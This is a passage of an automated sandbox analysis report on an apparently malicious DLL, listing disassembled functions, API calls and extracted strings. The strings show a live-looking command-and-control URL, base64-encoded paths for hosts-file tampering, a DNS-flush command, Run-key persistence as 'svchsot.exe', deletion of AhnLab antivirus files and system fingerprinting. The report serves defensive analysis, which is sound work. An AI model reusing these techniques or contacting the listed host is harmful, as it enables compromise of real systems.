                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
                                                • String ID: %s%s$MZ@$log.txt
                                                • API String ID: 2392943451-673521906
                                                • Opcode ID: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                • Instruction ID: d5d278936535e4cba90bc0b152de8e4c93260a9cf759ec48f07ff2ba3d5d953d
                                                • Opcode Fuzzy Hash: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                • Instruction Fuzzy Hash: DF41B5B1148345AFE328CB74CC899EB7BA9EBC8350F404A2DF75A872D0DFB499098651
                                                Function 10009240 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 205sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                  • Part of subcall function 10001000: 6CEE2C70.MFC42(00000001,?,74DF0F00), ref: 1000115C
                                                • Sleep.KERNEL32(0000EA60), ref: 10009288
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100092D3
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100092DF
                                                • Sleep.KERNEL32(000927C0), ref: 10009420
                                                • wsprintfA.USER32 ref: 10009471
                                                • Sleep.KERNEL32(000927C0), ref: 100094CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Sleep$DirectorySystem$lstrcpywsprintf
                                                • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.241.232:12354/show.php$iOffset
                                                • API String ID: 2291147283-888787304
                                                • Opcode ID: 5922782ddf026c53060f0f63c1ad289b21dee719ea41d24eaeab7540742c2ec5
                                                • Instruction ID: b8854392ff10616702e47e0bcfff7711cc3888a46334cdc6d8595219f0281411
                                                • Opcode Fuzzy Hash: 5922782ddf026c53060f0f63c1ad289b21dee719ea41d24eaeab7540742c2ec5
                                                • Instruction Fuzzy Hash: B55146756046446BE365C674CC52BEB36C6EBC82D0F100A3CF64A872C6EE71EA498692
                                                Function 1000B6A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 189sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 292 1000b6a0-1000b775 GetSystemDirectoryA * 2 call 10001000 * 2 call 10010f36 299 1000b777-1000b7c2 call 10006d70 292->299 302 1000b7c4-1000b7d9 299->302 303 1000b7db-1000b7ec 299->303 304 1000b7ed-1000b819 call 10004920 call 10007470 302->304 303->304 309 1000b81b-1000b828 Sleep 304->309 310 1000b82d-1000b831 304->310 309->299 311 1000b833-1000b83b 310->311 312 1000b857-1000b866 310->312 315 1000b842-1000b845 311->315 316 1000b83d-1000b841 311->316 313 1000b8b0-1000b8db call 10009640 Sleep 312->313 314 1000b868-1000b86a 312->314 313->299 317 1000b86f-1000b875 314->317 319 1000b847-1000b84a 315->319 320 1000b84c 315->320 316->315 321 1000b893-1000b895 317->321 322 1000b877-1000b879 317->322 324 1000b84f-1000b855 319->324 320->324 327 1000b898-1000b89a 321->327 325 1000b87b-1000b883 322->325 326 1000b88f-1000b891 322->326 324->311 324->312 325->321 328 1000b885-1000b88d 325->328 326->327 327->313 329 1000b89c-1000b8ad wsprintfA 327->329 328->317 328->326 329->313
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6EA
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6F9
                                                  • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                  • Part of subcall function 10001000: 6CEE2C70.MFC42(00000001,?,74DF0F00), ref: 1000115C
                                                • Sleep.KERNEL32(000927C0), ref: 1000B822
                                                • wsprintfA.USER32 ref: 1000B8A7
                                                • Sleep.KERNEL32(000927C0), ref: 1000B8D5
                                                Strings
                                                • http://107.163.241.232:12354/show.php, xrefs: 1000B7DB
                                                • 127.0.0.1, xrefs: 1000B8B5
                                                • cmd.exe /c ipconfig /flushdns, xrefs: 1000B8C4
                                                • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B716
                                                • 8.8.8.8, xrefs: 1000B8B0
                                                • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B6FB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DirectorySleepSystem$lstrcpywsprintf
                                                • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.232:12354/show.php
                                                • API String ID: 2704893763-1395296613
                                                • Opcode ID: db2d6b3046defbdf920574d5d26133844e3622f0e207e53ae40463d585e72ec7
                                                • Instruction ID: 0c20509c5945297f8f237a4b3797596a51a84c821cbe864c7c2b37f26de8eee8
                                                • Opcode Fuzzy Hash: db2d6b3046defbdf920574d5d26133844e3622f0e207e53ae40463d585e72ec7
                                                • Instruction Fuzzy Hash: CC518D71504A486BE364CA74CC91AEB3BCAEB893D0F104A3CF7468B2D5EE71D948C391
                                                Function 10006F20 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 151registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F4F
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007009
                                                • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 10007062
                                                  • Part of subcall function 10004C70: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,74DF0F10,?,1000AAC6,?,74DF0F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                  • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,74DF0F00), ref: 10004C65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
                                                • String ID: %u MB$09121307$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.232:12354/show.php
                                                • API String ID: 2543995030-394306148
                                                • Opcode ID: 4e22ea78a27a306f584328a55715875c7210a62967ded5604e4a38dd3874c05e
                                                • Instruction ID: 3ad2bcc863b837c91c8faade8dea923d340ec5ffd05ed7ea934ab2fdf9765298
                                                • Opcode Fuzzy Hash: 4e22ea78a27a306f584328a55715875c7210a62967ded5604e4a38dd3874c05e
                                                • Instruction Fuzzy Hash: 8041F5766002045BE714CA28DC81BAB77D6FBC8350F544A2CFA59CB2C5EE78E908C796
                                                Function 1000B8E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 65fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DeleteFile$wsprintf
                                                • String ID: %s\ASDSvc.exe$%s\V3Lite.exe$C:\1.vbs$InstallPath$U09GVFdBUkVcQWhuTGFiXFYzTGl0ZQ==
                                                • API String ID: 1588361905-790033058
                                                • Opcode ID: 78508965cc5a19c928f5a57ae299255aa932a64f56e005951962bd9cc420be60
                                                • Instruction ID: 1dfada7e8b5ca1f324769cc69037653655a4e6411eba5475badaeff67279124f
                                                • Opcode Fuzzy Hash: 78508965cc5a19c928f5a57ae299255aa932a64f56e005951962bd9cc420be60
                                                • Instruction Fuzzy Hash: E2110AB65043447EE714D264DC82EEBB7A9EBC8350F00892DF74897141EAB8A54C87A3
                                                Function 10008CF0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61sleepsynchronizationthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 10008D13
                                                  • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF
                                                • GetLastError.KERNEL32 ref: 10008D2C
                                                • CloseHandle.KERNEL32(00000000), ref: 10008D9E
                                                  • Part of subcall function 10007800: wsprintfA.USER32 ref: 10007863
                                                • Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 10008D60
                                                • CreateThread.KERNEL32 ref: 10008D7C
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008D87
                                                • CloseHandle.KERNEL32(00000000), ref: 10008D8E
                                                • Sleep.KERNEL32(0002BF20), ref: 10008D99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
                                                • String ID: 0x5d65r455f$5655029807
                                                • API String ID: 3565103679-1179119988
                                                • Opcode ID: 1a3b27e525e8e5581aee81941031d63d0a25c614fe17f581aa30fa82347c58f1
                                                • Instruction ID: 7f0c169c507e5996f06a3fa8500c359fcd6d382ddda4958c890d8906a17dfaa3
                                                • Opcode Fuzzy Hash: 1a3b27e525e8e5581aee81941031d63d0a25c614fe17f581aa30fa82347c58f1
                                                • Instruction Fuzzy Hash: 90112BB664021477F361D7609C4AFAA3748E755391F014231FB05991C6DA749514C3A7
                                                Function 1000C3E0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 1000c3e0-1000c42a Netbios 400 1000c42c-1000c43e 399->400 401 1000c43f-1000c447 399->401 402 1000c449-1000c466 Netbios 401->402 403 1000c48e-1000c4ee Netbios 401->403 402->403 406 1000c468-1000c475 402->406 404 1000c4f0-1000c502 403->404 405 1000c503-1000c572 sprintf 403->405 406->402 407 1000c477-1000c479 406->407 407->403 408 1000c47b-1000c48d 407->408
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Netbios
                                                • String ID: %02X%02X%02X%02X%02X%02X$2$3
                                                • API String ID: 544444789-1505804699
                                                • Opcode ID: ed2c05e4c58613b2c26dfba51cf9c36810fcacaa73115f46d11269ef5a7d970f
                                                • Instruction ID: 728b9448df0537b33cd7c33a8ad28386f52a8ed2ab8d8cf9ed196ef958deebfa
                                                • Opcode Fuzzy Hash: ed2c05e4c58613b2c26dfba51cf9c36810fcacaa73115f46d11269ef5a7d970f
                                                • Instruction Fuzzy Hash: E141BC361187829BD724CB68C8107FBB7E5EFC4354F44483DA5D48B682DAB8A6098793
                                                Function 1000B9B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108registrysleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 409 1000b9b0-1000b9fc call 10010f90 412 1000ba01-1000ba1f RegOpenKeyExA 409->412 413 1000ba25-1000ba55 RegQueryInfoKeyA 412->413 414 1000baf8-1000bb0e RegCloseKey Sleep 412->414 413->414 415 1000ba5b-1000ba63 413->415 414->412 415->414 416 1000ba69-1000bac2 415->416 418 1000bac4-1000bad6 416->418 419 1000baeb-1000baf2 416->419 418->419 421 1000bad8-1000bae4 418->421 419->414 419->416 421->419
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA17
                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA4D
                                                • RegCloseKey.ADVAPI32(00000000), ref: 1000BAFD
                                                • Sleep.KERNEL32(000493E0), ref: 1000BB08
                                                Strings
                                                • svchsot.exe, xrefs: 1000BAC8
                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA0D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseInfoOpenQuerySleep
                                                • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
                                                • API String ID: 2225969182-2172464104
                                                • Opcode ID: 08361449016b7f44612439fb6acee60cc4640fc407a9dfebd49ab1ea5b08d991
                                                • Instruction ID: 8391b5504ccf8cab49b59508a831428093b3ef4b36d771d3e57068c3abc199ad
                                                • Opcode Fuzzy Hash: 08361449016b7f44612439fb6acee60cc4640fc407a9dfebd49ab1ea5b08d991
                                                • Instruction Fuzzy Hash: 00313D71209342AFE311CF55CC84FABB7E9FBC9B44F40492DF28596184DA74EA05CBA2
                                                Function 10008DC0 Relevance: 10.5, APIs: 7, Instructions: 46sleepsynchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WS2_32(00000202), ref: 10008DD4
                                                  • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF
                                                • GetLastError.KERNEL32 ref: 10008DFA
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00008A70,?,00000000,00000000), ref: 10008E20
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008E27
                                                • CloseHandle.KERNEL32(00000000), ref: 10008E2A
                                                • Sleep.KERNEL32(00002710), ref: 10008E35
                                                • CloseHandle.KERNEL32(00000000), ref: 10008E3E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
                                                • String ID:
                                                • API String ID: 3243752880-0
                                                • Opcode ID: a33727e10fbf79d2b309350ef58ca67d960a310af08ab45507f6163eac35f4c8
                                                • Instruction ID: a359fb298355683a4573c8a866c24d0698d26be9667dacd13f7a321984fbe110
                                                • Opcode Fuzzy Hash: a33727e10fbf79d2b309350ef58ca67d960a310af08ab45507f6163eac35f4c8
                                                • Instruction Fuzzy Hash: C9012875244260BBF2219760DC4EF9E3B68FB8A7A0F114224FB18961C2C7B4691083BB
                                                Function 100094E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 117sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • http://107.163.241.232:12354/show.php, xrefs: 10009553
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Sleep$wsprintf
                                                • String ID: http://107.163.241.232:12354/show.php
                                                • API String ID: 3195947292-2344152501
                                                • Opcode ID: 8f976409f3338855f43dfdd1e78e4cb3942958b9788ba1596308c0077738c756
                                                • Instruction ID: d4c08372696571601e49f361774c7e6739f4c64afbccb80dc67fb9e03b5bb553
                                                • Opcode Fuzzy Hash: 8f976409f3338855f43dfdd1e78e4cb3942958b9788ba1596308c0077738c756
                                                • Instruction Fuzzy Hash: 26315E71504A856BF365CA34CC92ADB3BC7EB853D0F11492CF6858B189EA37D9498352
                                                Function 10001000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                • 6CEE2C70.MFC42(00000001,?,74DF0F00), ref: 1000115C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: lstrcpy
                                                • String ID: VUUU
                                                • API String ID: 3722407311-2040033107
                                                • Opcode ID: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
                                                • Instruction ID: c786a2ff591aff92977bd3f5140d7e1907602f98ed4a153bb8b8b05817a39e60
                                                • Opcode Fuzzy Hash: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
                                                • Instruction Fuzzy Hash: AF416B31B0049207F32DC62C8CB227ABBD2DB922C0B54813EE6C7C7256D9A2DD66C350
                                                Function 10011171 Relevance: 3.8, APIs: 3, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: _inittermfreemalloc
                                                • String ID:
                                                • API String ID: 1678931842-0
                                                • Opcode ID: 5140d0d9db605dcb194d2652ea19dca16f20f6a940eaa12075955abeed17ba9d
                                                • Instruction ID: ad2f920e9778d69807a12391a49186a6d5e25611a08f9dc3c907af6526498538
                                                • Opcode Fuzzy Hash: 5140d0d9db605dcb194d2652ea19dca16f20f6a940eaa12075955abeed17ba9d
                                                • Instruction Fuzzy Hash: A4112E32648226ABE718CB64EDD5F8977A5FB05295F158019E901CB2A0E732E890CB95
                                                Function 10002580 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcAddress.KERNEL32(73AC0000,00000000), ref: 100025A4
                                                Strings
                                                • TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002590
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: TmV0TG9jYWxHcm91cEVudW0=
                                                • API String ID: 190572456-980335172
                                                • Opcode ID: ded17689c4bd67110a5be128d15644960cbee1cf4a5f393b86463d8bf9b49e85
                                                • Instruction ID: e2bb3045dcad879353c92d9ca582775d4a1260cfb397e564f33c378eb59ea92b
                                                • Opcode Fuzzy Hash: ded17689c4bd67110a5be128d15644960cbee1cf4a5f393b86463d8bf9b49e85
                                                • Instruction Fuzzy Hash: 9CC04CF58007109BF642DBA49D85B4A3799E74C28AB018424F51DD222AE734E2959B15
                                                Function 10002640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcAddress.KERNEL32(73AC0000,00000000), ref: 10002664
                                                Strings
                                                • TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002650
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: TmV0QXBpQnVmZmVyRnJlZQ==
                                                • API String ID: 190572456-3244026974
                                                • Opcode ID: 5da32a4a5574a052550975bb5b0bbc93ab09694d4bcd5f2703c64bdbfbfc511d
                                                • Instruction ID: 0ade1f184abd6a37764815a29ceca78810d2d009be9ca9e5ee1f1b4efe6a2c35
                                                • Opcode Fuzzy Hash: 5da32a4a5574a052550975bb5b0bbc93ab09694d4bcd5f2703c64bdbfbfc511d
                                                • Instruction Fuzzy Hash: AFC08CF88006205BF642CB608C84B0A3398E30C38AB008010F659D222AD730E1A08B11
                                                Function 1000B5E0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 1000B0A0: lstrcpy.KERNEL32(?,?), ref: 1000B0D9
                                                  • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,10019BD4), ref: 1000B0F2
                                                  • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,*.*), ref: 1000B101
                                                  • Part of subcall function 1000B0A0: FindFirstFileA.KERNEL32(?,?,?,1000B62C,?), ref: 1000B113
                                                • Sleep.KERNEL32(0036EE80), ref: 1000B686
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
